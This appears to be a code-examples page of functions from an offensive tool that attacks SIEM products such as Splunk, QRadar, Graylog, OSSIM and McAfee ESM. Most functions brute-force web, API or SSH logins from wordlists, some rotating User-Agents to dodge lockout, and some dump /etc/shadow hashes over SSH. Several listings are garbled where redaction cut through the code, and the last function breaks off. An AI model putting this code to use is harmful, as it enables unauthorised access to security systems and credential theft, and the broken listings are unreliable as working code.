예제 #1
def qradar_apikeybrute(ip, port):
    """Try each line of the ``keys`` file as a QRadar ``SEC`` API token.

    Args:
        ip: Target host, concatenated into the URL unchanged.
        port: Target port, passed through ``str()``.

    Relies on module-level names defined elsewhere: ``os``, ``requests``,
    ``Fore``/``Style``, ``keys`` (the wordlist file name), ``api_dict`` and
    the project's ``globals`` module. Results are reported through
    ``globals`` messages; nothing is returned.
    """
    # Directory of this module, resolved relative to the current working dir.
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))

    if os.path.isfile(os.path.join(__location__, keys)):
        # NOTE(review): ``file`` shadows the builtin; a ``with`` block would
        # also guarantee the handle is released on every exit path.
        file = open(os.path.join(__location__, keys))
    else:
        cant = input(
            Fore.CYAN + Style.BRIGHT +
            "[!] Enter the number of apikeys you want in the dictionary: " +
            Style.RESET_ALL)
        try:
            api_dict(cant)
            file = open(os.path.join(__location__, keys))
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit, and when this path is taken ``file`` is never bound,
        # so the loop below fails with NameError.
        except:
            globals.qradar_messages(1)

    bfs = 0  # becomes 1 once a token is accepted

    for line in file:

        api = line.strip('\n\r')
        url = globals.https + ip + ":" + str(port) + "/api/system/servers"
        headers = {'SEC': api}

        # verify=False disables TLS certificate validation: every token is
        # sent to whatever answers at ``ip`` without the server being
        # authenticated.
        if requests.get(url, headers=headers, verify=False).status_code == 200:
            globals.messages(7)
            globals.qradar_messages(2, api)
            bfs = 1
            file.close()
            break

    if bfs == 0:
        globals.messages(8)
        file.close()
예제 #2
def smonster_ssh_info(ip):
    """Log in to ``ip`` over SSH as the deploy user and print host details.

    Prompts for the password, runs each ``(command, heading)`` pair from
    ``commands`` and prints the command's stdout under its heading.
    Authentication failures are reported via ``globals.messages(10)``.
    Returns nothing.
    """
    # NOTE(review): the text from this input() call up to the ``commands``
    # list is corrupted in this listing (redaction marker ``******``): the
    # SSH client setup and the opening of the ``try`` block are missing.
    password = input(Fore.CYAN + Style.NORMAL +
                     "[!] Enter SIEMonster deploy's password: "******"hostname", "[!] Hostname"),
                    ("docker ps --format \"table {{.Names}}\t{{.Ports}}\t"
                     "{{.Status}}\"", "[!] Active Containers"),
                    ("ls -1  /etc/rc5.d", "[!] List service active"),
                    ("ifconfig", "[!] Network Configuration"),
                    ("sudo iptables -nL", "[!] FW Configuration")]

        for command in commands:
            stdin, stdout, stderr = ssh.exec_command(command[0])
            # NOTE(review): ``stdout`` is a channel file object, never the
            # string "", so this condition is always true.
            if stdout != "":
                print('')
                print(Fore.GREEN + Style.NORMAL + command[1])
                print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL)
                for i in stdout.readlines():
                    print('[!]  ' + i.replace('\n', ''))

    # The client is only closed on an authentication failure here; on the
    # success path the connection is left open.
    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
예제 #3
def menus(menu):
	"""Display the menu selected by ``menu`` and return the user's raw choice.

	``menu`` is ``1`` (main menu), ``2`` (application menu) or a SIEM name;
	the option labels come from the matching list in ``globals``. The
	returned value is exactly what the user typed, without validation.
	"""
	globals.messages(1, '')

	# Name of the globals list backing each menu key; resolved lazily so
	# only the selected list is read.
	menu_lists = {
		1: 'main_menu',
		"Splunk": 'splunk_menu',
		"Graylog": 'graylog_menu',
		"OSSIM": 'ossim_menu',
		"QRadar": 'qradar_menu',
		"McAfee": 'mcafee_menu',
		"SIEMonster": 'smonster_menu',
		"ElasticSIEM": 'elastic_menu',
		2: 'app_menu',
	}
	if menu in menu_lists:
		options = enumerate(getattr(globals, menu_lists[menu]), 1)

	for number, label in options:
		print(Fore.GREEN + Style.BRIGHT + '\t[' + str(number) + '] ' + label)

	# The "[X]" row says where leaving this menu goes.
	exit_labels = {1: '\t[X] Exit', 2: '\t[X] Return to Attack Menu'}
	print(Fore.GREEN + Style.BRIGHT + exit_labels.get(menu, '\t[X] Return to Main Menu'))
	print(Fore.GREEN + Style.BRIGHT + SEPARATOR)

	choice = input(
		Fore.CYAN + Style.NORMAL + "[!] Enter your selection: " + Style.RESET_ALL)
	return choice
예제 #4
def scan_detect():
	"""Prompt for a host and port, fingerprint the SIEM there and offer its menu.

	An empty host or port reports an error and falls back to the main menu.
	When ``port`` equals the integer ``0`` the SIEM's usual management port
	is substituted before calling ``attack_choice``. Returns nothing.
	"""
	ip = input_ip()
	port = input_port()
	siemdetected = ''
	if (ip and port) != '':
		siemdetected = scan_host(ip, port)
	else:
		globals.messages(3)
		sleep(1)
		main_choice()

	choice2 = input(
		Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " +
		siemdetected + " attack module (Y/N): " + Style.RESET_ALL)

	if choice2.lower() != "y":
		main_choice()
		return

	# Management port used in place of a zero port, per product.
	default_ports = {
		"Splunk": '8089',
		"Graylog": '9000',
		"OSSIM": '443',
		"QRadar": '443',
		"McAfee": '443',
		"SIEMonster": '443',
	}
	if port == 0 and siemdetected in default_ports:
		attack_choice(siemdetected, ip, default_ports[siemdetected])
	else:
		attack_choice(siemdetected, ip, port)
예제 #5
def find_siem():
	"""Sweep a network range for SIEM hosts, then ask which one to attack.

	The range must match ``globals.net_val``; otherwise an error is shown
	and control falls back to the main menu. Each host found is passed to
	``scan_host`` and the user then picks a host and port for
	``attack_choice``. Returns nothing.
	"""
	siemnet = input_net()

	if re.search(globals.net_val, siemnet):
		ips = scan_network(siemnet)
	else:
		globals.messages(4)
		sleep(1)
		main_choice()
	globals.messages(6)

	# host -> whatever scan_host reports for it
	siemsdetected = {host: scan_host(host, '0') for host in ips}

	siemchoice = input(
		Fore.CYAN + Style.BRIGHT +
		"[!] Enter the IP address of the SIEM to attack: " +
		Style.RESET_ALL)
	portchoice = input(
		Fore.CYAN + Style.BRIGHT + "[!] Enter the port of the SIEM to attack: " +
		Style.RESET_ALL)

	choice2 = input(
		Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " +
		siemsdetected[siemchoice] + " attack module (Y/N): " + Style.RESET_ALL)

	if choice2.lower() != "y":
		main_choice()
		return
	attack_choice(siemsdetected[siemchoice], siemchoice, portchoice)
예제 #6
def attack_choice(siemdetected, ip, port):
	"""Show the menu for ``siemdetected`` and dispatch the selected module.

	An unknown SIEM name falls through to the exit / invalid-input handling
	of the menu. After a module returns, the user may reopen this menu or
	go back to the main menu. Returns nothing.
	"""
	choiceerror = 0
	attackchoice = menus(siemdetected)

	# Per-product entry points; each takes (choice, ip, port).
	modules = {
		"Splunk": splunk_attack,
		"Graylog": graylog_attack,
		"OSSIM": ossim_attack,
		"QRadar": qradar_attack,
		"McAfee": mcafee_attack,
		"SIEMonster": smonster_attack,
		"ElasticSIEM": elastic_attack,
	}
	if siemdetected in modules:
		modules[siemdetected](attackchoice, ip, port)
	elif attackchoice.lower() == "x":
		main_choice()
	else:
		globals.messages(2)
		sleep(1)
		attack_choice(siemdetected, ip, port)
		choiceerror = 1

	# "0" is the module's own "return" entry; no prompt after an error either.
	if attackchoice != "0" and choiceerror != 1:
		choice3 = input(
			Fore.CYAN + Style.BRIGHT +
			"[!] Do you want to return to the attack menu (Y/N): " +
			Style.RESET_ALL)
		if choice3.lower() == "y":
			attack_choice(siemdetected, ip, port)
		else:
			main_choice()
예제 #7
def smonster_ssh_bf(ip):
    """Try each line of ``dict.txt`` as the SSH password for ``deploy`` on ``ip``.

    The wordlist is read from this module's directory. Port 22 is probed
    with nmap first; ``ssh_credentials`` (defined elsewhere) performs each
    login attempt. Outcome is reported through ``globals`` messages and
    nothing is returned.
    """
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # NOTE(review): ``file`` shadows the builtin; a ``with`` block would
    # release the handle on every path instead of the explicit closes below.
    file = open(os.path.join(__location__, 'dict.txt'))
    nm = nmap.PortScanner()
    bps = 0  # becomes 1 once a password is accepted

    try:
        # TCP connect scan of port 22 only.
        nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
        if nm[ip]['tcp'][22]['state'] == 'open':
            for line in file:
                password = line.strip('\n\r')
                if ssh_credentials(ip, password):
                    mess = ['deploy', password]
                    globals.messages(7)
                    globals.messages(9, mess)
                    file.close()
                    bps = 1
                    break
            if bps == 0:
                globals.messages(8)
                file.close()
        else:
            globals.messages(8)
            file.close()

    # Any failure (scan error, host missing from the nmap result, I/O) is
    # reported as "not found" and logged with its traceback.
    except Exception as e:
        globals.messages(8)
        file.close()
        logging.error(e, exc_info=True)
예제 #8
def smonster_users_server(ip):
    """Log in to ``ip`` over SSH and print the contents of ``/etc/shadow``.

    Prompts for the deploy user's password and reads the file through
    ``sudo cat``. Authentication failures are reported via
    ``globals.messages(10)``. Returns nothing.
    """
    # NOTE(review): the text from this input() call to the exec_command
    # call is corrupted in this listing (redaction marker ``******``); the
    # SSH client setup and the opening of the ``try`` block are missing.
    password = input(Fore.CYAN + Style.NORMAL +
                     "[!] Enter SIEMonster deploy's password: "******"sudo cat /etc/shadow")
        std.flush()
        shadow_file = stdout.readlines()
        globals.smonster_messages(2)
        # Password hashes are written to the terminal in clear.
        for line in shadow_file:
            print('[!] ' + line.replace('\n', ''))

        ssh.close()

    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
예제 #9
def elastic_ssh_brute(ip):
    """Try each line of ``dict.txt`` as the SSH password for a user on ``ip``.

    The username is prompted for; an empty answer falls back to a fixed
    default (redacted in this listing). Port 22 is probed with nmap first
    and ``ssh_credentials`` (defined elsewhere) performs each attempt.
    Outcome is reported through ``globals`` messages; nothing is returned.
    """
    username = input(Fore.CYAN + Style.NORMAL +
                     "[!] Enter username of operations system: ")
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # NOTE(review): ``file`` shadows the builtin; a ``with`` block would
    # release the handle on every path instead of the explicit closes below.
    file = open(os.path.join(__location__, 'dict.txt'))
    nm = nmap.PortScanner()
    bps = 0  # becomes 1 once a password is accepted
    if username == '':
        username = '******'

    try:
        # TCP connect scan of port 22 only.
        nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
        if nm[ip]['tcp'][22]['state'] == 'open':
            for line in file:
                password = line.strip('\n\r')
                if ssh_credentials(ip, password, username):
                    mess = [username, password]
                    globals.messages(7)
                    globals.messages(9, mess)
                    file.close()
                    bps = 1
                    break
            if bps == 0:
                globals.messages(8)
                file.close()
        else:
            globals.messages(8)
            file.close()

    # Any failure (scan error, host missing from the nmap result, I/O) is
    # reported as "not found" and logged with its traceback.
    except Exception as e:
        globals.messages(8)
        file.close()
        logging.error(e, exc_info=True)
예제 #10
def graylog_detect(siemip, siemport):
	"""Return ``"Graylog"`` when its web interface answers at siemip:siemport.

	The request goes over plain HTTP (module-level ``http`` prefix). Any
	exception is logged with its traceback and treated as "not detected",
	in which case ``None`` is returned.
	"""
	url = http + siemip + ":" + siemport
	try:
		response = requests.get(url)
		if "Graylog Web Interface" in response.text:
			siemdetected = "Graylog"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #11
def splunk_detect(siemip, siemport):
	"""Return ``"Splunk"`` when the response body at siemip:siemport mentions splunkd.

	``verify=False`` disables TLS certificate validation for the probe.
	Any exception is logged with its traceback and treated as "not
	detected", in which case ``None`` is returned.
	"""
	url = https + siemip + ":" + siemport
	try:
		body = requests.get(url, verify=False).text
		if "splunkd" in body:
			siemdetected = "Splunk"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #12
def ossim_detect(siemip, siemport):
	"""Return ``"OSSIM"`` when the OSSIM login page is served at siemip:siemport.

	``verify=False`` disables TLS certificate validation for the probe.
	Any exception is logged with its traceback and treated as "not
	detected", in which case ``None`` is returned.
	"""
	url = https + siemip + ":" + siemport + "/ossim/session/login.php"
	try:
		body = requests.get(url, verify=False).text
		if "AlienVault OSSIM" in body:
			siemdetected = "OSSIM"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #13
def qradar_detect(siemip, siemport):
	"""Return ``"QRadar"`` when the ``Server`` response header names it.

	Probes ``/console/`` over HTTPS with certificate validation disabled.
	A missing ``Server`` header raises ``KeyError``, which is caught with
	every other exception, logged and treated as "not detected" (``None``).
	"""
	url = https + siemip + ":" + siemport + "/console/"
	try:
		server_header = requests.get(url, verify=False).headers['Server']
		if "QRadar" in server_header:
			siemdetected = "QRadar"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #14
def smonster_detect(siemip, siemport):
	"""Return ``"SIEMonster"`` when the page title at siemip:siemport names it.

	``verify=False`` disables TLS certificate validation for the probe.
	Any exception is logged with its traceback and treated as "not
	detected", in which case ``None`` is returned.
	"""
	url = https + siemip + ":" + siemport
	try:
		body = requests.get(url, verify=False).text
		if 'title>SIEMonster ' in body:
			siemdetected = "SIEMonster"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #15
def mcafee_detect(siemip, siemport):
	"""Return ``"McAfee"`` when the body at siemip:siemport contains both marker words.

	Both ``'McAfee'`` and ``'SIEM'`` must appear in the response text.
	``verify=False`` disables TLS certificate validation for the probe. Any
	exception is logged and treated as "not detected" (``None``).
	"""
	url = https + siemip + ":" + siemport
	try:
		body = requests.get(url, verify=False).text
		markers_present = 'McAfee' in body and 'SIEM' in body
		if markers_present:
			siemdetected = "McAfee"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #16
def bruteforce_splunk(ip, port):
    """Try an empty password, a fixed default, then ``dict.txt`` against Splunk.

    Uses the module-level ``client`` object (defined elsewhere; its
    ``connect`` raising is the only failure signal). The username literal
    is redacted in this listing; the result messages report it as ``admin``.
    Outcome goes through ``globals`` messages; nothing is returned.
    """

    username = "******"
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # NOTE(review): ``file`` shadows the builtin; a ``with`` block would
    # release the handle on every path instead of the explicit closes below.
    file = open(os.path.join(__location__, 'dict.txt'))
    bfs = 0          # 1 when a wordlist entry was accepted
    free = 0         # 1 when an empty password was accepted
    defaultpass = 0  # 1 when the fixed default password was accepted

    # First Try Default Password "changeme" and Splunk Free Version

    # NOTE(review): the bare excepts below treat every exception — network
    # errors, interrupts — as a rejected password, so a host that is down
    # is indistinguishable from a wrong guess.
    try:
        client.connect(host=ip, port=port, username=username, password="")
        free = 1
    except:
        pass
    try:
        client.connect(host=ip,
                       port=port,
                       username=username,
                       password="******")
        defaultpass = 1
    except:
        pass

    # NOTE(review): ``(free and defaultpass) == 0`` is true whenever either
    # flag is 0, so the wordlist still runs after the empty password
    # succeeded; ``free == 0 and defaultpass == 0`` is probably intended.
    if (free and defaultpass) == 0:
        for line in file:
            splunk_password = line.strip('\n\r')

            try:
                client.connect(host=ip,
                               port=port,
                               username=username,
                               password=splunk_password)
                bfs = 1
                break
            except:
                pass

    # Reporting order: empty password, then the default, then the wordlist hit.
    if (bfs or free or defaultpass) == 1:
        globals.messages(7)
        if free == 1:
            globals.messages(9, ['admin', 'no password'])
            file.close()
        elif defaultpass == 1:
            globals.messages(9, ['admin', 'changeme'])
            file.close()
        else:
            globals.messages(9, ['admin', splunk_password])
            file.close()

    else:
        globals.messages(8)
        file.close()
예제 #17
def mcafee_webinfo(ip, port):
	"""Log in to the McAfee ESM REST API and print selected system fields.

	Prompts for the NGCP web user's password, sends the ``/ess`` pre-login
	request and the JSON login, then reads ``/rs/v1/systemInformation``
	with the returned cookie and XSRF token. Every request uses
	``verify=False`` (no TLS certificate validation). Exceptions are logged
	with their traceback; nothing is returned.
	"""
	# NOTE(review): ``agents`` is a plain string here, so ``agents[a]`` with
	# ``a == 0`` yields the single character 'M', not the whole User-Agent.
	agents = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0'
	a = 0
	password = input(
		Fore.CYAN + Style.NORMAL + "[!] Enter password of the user Web NGCP: "
		+ Style.RESET_ALL)
	url1 = globals.https + ip + ":" + str(port) + "/ess"
	url2 = globals.https + ip + ":" + str(port) + "/rs/esm/v2/login"
	url3 = globals.https + ip + ":" + str(port) + "/rs/v1/systemInformation"
	headers = {
		'Accept': 'application/json,text/plain,*/*',
		'DNT': '1',
		'Host': ip,
		'Origin': globals.https + ip,
		'Referer': globals.https + ip,
		'User-Agent': agents[a],
		'Content-Type': 'application/json;charset=utf-8',
		# NOTE(review): 'keep - alive' is not a valid Connection token;
		# 'keep-alive' is presumably intended.
		'Connection': 'keep - alive',
		'X-Xsrf-Token': 'null'
		}

	# The username literal is redacted in this listing. The password is only
	# base64-encoded here, i.e. sent reversibly in the request body.
	params = {
		'username': '******',
		'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'),
		'locale': 'en_US',
		'os': "Linux x86_64"
		}
	json_params = json.dumps(params).encode('utf-8')
	# Fields of the systemInformation response that get printed.
	data_show = [
		'callHomeIp', 'releaseNumber', 'hdd',
		'ram', 'processor', 'esssystemTime',
		'statusAndAlertNextCheckIn', 'rulesAndSoftNextCheck', 'backupNextTime'
	]

	try:
		requests.post(
			url1, data='Request=API%13CAC%5FLOGIN%13%14',
			headers=headers, verify=False)
		headers['Accept'] = 'application/json'
		response = requests.post(
			url2, data=json_params, headers=headers, verify=False)
		# 201 is treated as a successful login.
		if response.status_code == 201:
			# NOTE(review): the raw Set-Cookie value (including attributes
			# such as Path/HttpOnly) is replayed as the Cookie header; a
			# requests.Session would handle the cookie jar properly.
			headers['Cookie'] = response.headers['Set-Cookie']
			headers['X-Xsrf-Token'] = response.headers['xsrf-token']
			response2 = requests.get(url3, headers=headers, verify=False)
			globals.mcafee_messages(1)
			data = json.loads(response2.text)
			# A field missing from the response raises KeyError, caught below.
			for field in data_show:
				if data[field] != "":
					print('[!] ' + field + ':  ' + str(data[field]))
		else:
			globals.messages(10)

	except Exception as e:
		logging.error(e, exc_info=True)
예제 #18
def elasticsiem_detect(siemip, siemport):
	"""Return ``"ElasticSIEM"`` when ``/app/siem`` at siemip:siemport looks like Kibana's SIEM app.

	Both the body (``"Elastic"``) and the ``kbn-name`` response header
	(``"elasticsiem"``) are checked; a missing header raises ``KeyError``,
	which is caught with every other exception, logged and treated as "not
	detected" (``None``). The probe goes over plain HTTP.
	"""
	url = http + siemip + ":" + siemport + '/app/siem'
	try:
		response = requests.get(url)
		body_match = "Elastic" in response.text
		if body_match and "elasticsiem" in response.headers['kbn-name']:
			siemdetected = "ElasticSIEM"
			globals.messages(5, [siemdetected, siemport])
			return siemdetected
	except Exception as e:
		logging.error(e, exc_info=True)
	return None
예제 #19
def ova_credentials(ip, user, password):
    """Attempt one SSH login to ``ip`` with ``user``/``password`` and report it.

    Success is reported via ``globals.splunk_messages(10)`` and
    ``globals.messages(9, [user, password])``; an authentication failure
    via ``globals.splunk_messages(11, ...)``. Other exceptions propagate.
    Returns nothing.
    """

    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts any unknown host key, so the credential is sent
    # to whichever host answers at ``ip`` without host authentication.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    mess = [user, password]
    try:
        ssh.connect(ip, username=user, password=password)
        globals.splunk_messages(10)
        globals.messages(9, mess)
        # NOTE(review): the client is never closed; the session stays open
        # until garbage collection.

    except paramiko.AuthenticationException:
        globals.splunk_messages(11, mess)
예제 #20
def main_choice():
	"""Run the main menu: scan one host, sweep a network, or exit.

	Invalid input reports an error and re-prompts by recursion; ``X``
	terminates the program via ``quit()``. Returns nothing.
	"""
	choice = menus(1)

	# Numbered actions of the main menu.
	actions = {
		"1": scan_detect,  # Scan and Detect SIEM
		"2": find_siem,    # Find SIEM on the Network
	}
	if choice in actions:
		actions[choice]()
	elif choice.upper() == "X":
		quit()
	else:
		globals.messages(2)
		main_choice()
예제 #21
def graylog_brute(ip, port):
    """Try each line of ``dict.txt`` against the Graylog sessions API.

    A ``200`` response from ``/api/system/sessions`` is taken as a valid
    login. The username literal is redacted in this listing; results are
    reported as ``admin``. Request errors are logged and the loop moves on.
    Outcome goes through ``globals`` messages; nothing is returned.
    """

    # Plain HTTP: credentials travel in clear text.
    url = \
     globals.http + ip + ":" + str(port) + "/api/system/sessions"
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    files = open(os.path.join(__location__, 'dict.txt'))
    bruteforcesuccesfull = 0  # 1 once a password is accepted

    for line in files:
        password = line.strip('\n\r')
        params = {'username': '******', 'password': password, 'host': ip}
        headers = {'X-Requested-By': 'XMLHttpRequest'}

        try:
            response = requests.post(url,
                                     json=params,
                                     headers=headers,
                                     verify=False)

            if response.status_code == 200:
                globals.messages(7)
                mess = ['admin', password]
                globals.messages(9, mess)
                bruteforcesuccesfull = 1
                # Closed again below; a second close() on a file object is a no-op.
                files.close()
                break

        # Connection/timeout errors are logged and the next entry is tried.
        except Exception as e:
            logging.error(e, exc_info=True)

    files.close()

    if not bruteforcesuccesfull:
        globals.messages(8)
예제 #22
def mcafee_users_server(ip):
    """Log in to ``ip`` over SSH and print ``/etc/shadow`` via SFTP.

    Prompts for the root password (the username literal is redacted in
    this listing). Authentication failures are reported via
    ``globals.messages(10)``; other exceptions propagate with the session
    left open. Returns nothing.
    """
    password = input(
        Fore.CYAN + Style.NORMAL + "[!] Enter McAfee root's password: "
        + Style.RESET_ALL)

    ssh = paramiko.SSHClient()
    ssh.load_system_host_keys()
    # AutoAddPolicy accepts any host key not already known, so the
    # password is sent to whichever host answers at ``ip``.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, username='******', password=password,
                    banner_timeout=200)
        sftp = ssh.open_sftp()
        shadow_file = sftp.open('/etc/shadow')
        globals.mcafee_messages(2)
        # Password hashes are written to the terminal in clear.
        for line in shadow_file:
            print('[!] ' + line.replace('\n', ''))

        shadow_file.close()
        ssh.close()

    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
예제 #23
def elastic_ssh_info(ip):
    """Log in to ``ip`` over SSH with a prompted username/password and print host details.

    Runs each ``(command, heading)`` pair from ``commands`` and prints the
    command's stdout under its heading. Authentication failures are
    reported via ``globals.messages(10)``. Returns nothing.
    """
    # NOTE(review): the text from this input() call up to the ``commands``
    # list is corrupted in this listing (redaction marker ``******``): the
    # password prompt, the SSH client setup and the opening of the ``try``
    # block are missing.
    username = input(Fore.CYAN + Style.NORMAL +
                     "[!] Enter ElasticSIEM's username: "******"[!] Enter ElasticSIEM's password: "******"hostname", "[!] Hostname"),
                    ("ls -1  /etc/rc5.d", "[!] List service active"),
                    ("ifconfig", "[!] Network Configuration"),
                    ('netstat -putan | grep LISTEN', "[!] Ports active")]

        for command in commands:
            std, stdout, stderr = ssh.exec_command(command[0])
            # NOTE(review): ``stdout`` is a channel file object, never the
            # string "", so this condition is always true.
            if stdout != "":
                print('')
                print(Fore.GREEN + Style.NORMAL + command[1])
                print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR +
                      Style.RESET_ALL)
                for i in stdout.readlines():
                    print('[!]  ' + i.replace('\n', ''))

        ssh.close()

    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
예제 #24
def ossim_brute(ip, port):
    """Try each line of ``dict.txt`` against the OSSIM web login form.

    A ``302`` status or a final URL equal to ``successurl`` is taken as a
    valid login. The username literal is redacted in this listing; results
    are reported as ``admin``. Request errors are logged and the loop moves
    on. Outcome goes through ``globals`` messages; nothing is returned.
    """

    url = globals.https + ip + ":" + str(port) + "/ossim/session/login.php"
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # NOTE(review): ``file`` shadows the builtin; a ``with`` block would
    # release the handle on every path instead of the explicit closes below.
    file = open(os.path.join(__location__, 'dict.txt'))
    # NOTE(review): built without ``port``, so the URL comparison below can
    # only match when the target listens on the default HTTPS port.
    successurl = globals.https + ip + "/ossim/"
    bruteforceresult = 0  # 1 once a password is accepted

    for line in file:

        ossimpassword = line.strip('\n\r')
        # The form expects the password both raw and base64-encoded.
        ossimpasswordb64 = base64.b64encode(ossimpassword.encode("utf-8"))
        base64string = str(ossimpasswordb64, "utf-8")
        params = {
            'embed': '',
            'bookmark_string': '',
            'user': '******',
            'passu': ossimpassword,
            'pass': base64string
        }

        try:
            # ``params=`` puts the credentials in the query string, where
            # they end up in server and proxy access logs; ``verify=False``
            # disables TLS certificate validation.
            response = requests.post(url, params=params, verify=False)

            if response.status_code == 302 or response.url == successurl:
                globals.messages(7)
                mess = ['admin', ossimpassword]
                globals.messages(9, mess)
                bruteforceresult = 1
                file.close()
                break

        except Exception as e:
            logging.error(e, exc_info=True)

    if not bruteforceresult:
        globals.messages(8)
        file.close()
예제 #25
def qradar_brute(ip, port):
    """Try each line of ``dict.txt`` against the QRadar console login.

    For every entry a fresh session fetches ``/console/`` to obtain the
    CSRF cookie, then posts to ``/console/j_security_check``. Landing on
    ``Main.jsp`` (or a ``322`` status) is taken as a valid login. The
    username literal is redacted in this listing; results are reported as
    ``admin``. Outcome goes through ``globals`` messages; nothing is
    returned.
    """
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # NOTE(review): ``file`` shadows the builtin; a ``with`` block would
    # release the handle on every path instead of the explicit closes below.
    file = open(os.path.join(__location__, 'dict.txt'))
    bfs = 0  # 1 once a password is accepted
    url_base = globals.https + ip + ":" + str(port)

    # User-Agent values rotated by index ``a``.
    agents = [
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, '
        'like Gecko) Chrome/79.0.3945.88 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) '
        'Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) '
        'Gecko/20100101 Firefox/42.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, '
        'like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) '
        'AppleWebKit/603.1.30 (KHTML, like Gecko)'
        ' Version/10.0 Mobile/14E304 Safari/602.1'
    ]
    a = 0

    for line in file:

        password = line.strip('\n\r')
        url = url_base + "/console/"
        session = requests.Session()
        headers = {'user-agent': agents[a]}
        # This GET is outside the try: a connection error here aborts the
        # whole function with the file left open.
        response = session.get(url, headers=headers, verify=False)
        headers = {'user-agent': agents[a], 'QRadarCSRF': 'null'}
        # NOTE(review): if 'CSRF=' is absent, find() returns -1 and the
        # slice silently starts at offset 4 of the Set-Cookie header; a
        # missing Set-Cookie header raises KeyError outside the try.
        qradarcsrf = response.headers[
            'Set-Cookie'][response.headers['Set-Cookie'].find('CSRF=') +
                          5:response.headers['Set-Cookie'].find('; Max')]

        params = {
            'j_username': '******',
            'j_password': password,
            'LoginCSRF': qradarcsrf
        }
        auth = url_base + "/console/j_security_check"

        try:
            response2 = session.post(auth,
                                     data=params,
                                     headers=headers,
                                     verify=False)

            # NOTE(review): 322 is not a standard HTTP status code; 302 is
            # presumably intended (requests follows redirects by default,
            # so the final URL check is the one that normally fires).
            if response2.url == url_base + "/console/core/jsp/Main.jsp" or response2.status_code == 322:
                globals.messages(7)
                globals.messages(9, ['admin', password])
                bfs = 1
                file.close()
                break
            else:
                # Advance through the five agents, then pause 30 minutes
                # before starting over.
                if a <= 3:
                    a += 1
                else:
                    time.sleep(1800)
                    a = 0

        except Exception as e:
            logging.error(e, exc_info=True)

    if bfs == 0:
        globals.messages(8)
        file.close()
예제 #26
def mcafee_brute(ip, port):
	"""Try each line of ``dict.txt`` against the McAfee ESM REST login.

	For every entry the ``/ess`` pre-login request is sent and, on a
	``200``, the JSON login to ``/rs/esm/v2/login``; a ``201`` there is
	taken as a valid login. The username literal is redacted in this
	listing; results are reported as ``NGCP``. Outcome goes through
	``globals`` messages; nothing is returned.
	"""
	__location__ = os.path.realpath(
		os.path.join(os.getcwd(), os.path.dirname(__file__)))
	# NOTE(review): this handle is never closed anywhere in the function;
	# a ``with`` block would fix that.
	file = open(os.path.join(__location__, 'dict.txt'))
	bruteforcesuccesfull = 0  # 1 once a password is accepted
	https = "https://"

	# User-Agent values rotated by index ``a``.
	agents = [
		'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,'
		' like Gecko) Chrome/79.0.3945.88 Safari/537.36',
		'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0',
		'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0',
		'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,'
		' like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41'
	]
	a = 0

	for line in file:

		password = line.strip('\n\r')
		url1 = https + ip + ":" + str(port) + "/ess"
		url2 = https + ip + ":" + str(port) + "/rs/esm/v2/login"
		headers = {
			'Accept': 'application/json,text/plain,*/*',
			'DNT': '1',
			'Host': ip,
			'Origin': 'https://' + ip,
			'Referer': 'https://' + ip,
			'User-Agent': agents[a],
			'Content-Type': 'application/json;charset=utf-8',
			# NOTE(review): 'keep - alive' is not a valid Connection token;
			# 'keep-alive' is presumably intended.
			'Connection': 'keep - alive',
			'X-Xsrf-Token': 'null'
		}

		# The password is only base64-encoded, i.e. sent reversibly in the body.
		params = {
			'username': '******',
			'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'),
			'locale': 'en_US',
